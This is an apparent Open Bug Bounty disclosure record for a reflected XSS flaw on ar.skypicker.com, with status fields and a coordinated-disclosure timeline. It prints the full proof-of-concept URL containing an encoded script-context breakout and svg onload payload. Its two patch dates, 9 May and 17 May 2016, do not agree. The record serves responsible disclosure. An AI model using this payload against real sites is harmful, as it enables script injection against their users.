Vulnerable URL:
https://ar.skypicker.com/?a=%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E
Details:
Description |
Value |
Patched: |
Yes, at 09.05.2016 |
Latest check for patch: |
09.05.2016 13:10 GMT |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
VIP website status: |
No |
Check ar.skypicker.com SSL connection: |
(Grade: A) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
27 April, 2016 16:58 GMT |
Vulnerability existence verified and confirmed |
27 April, 2016 20:42 GMT |
Notification sent to subscribers (without technical details) |
27 April, 2016 22:17 GMT |
Vulnerability details disclosed by researcher |
9 May, 2016 13:10 GMT |
Vulnerability patched by the website owner |
17 May, 2016 09:07 GMT |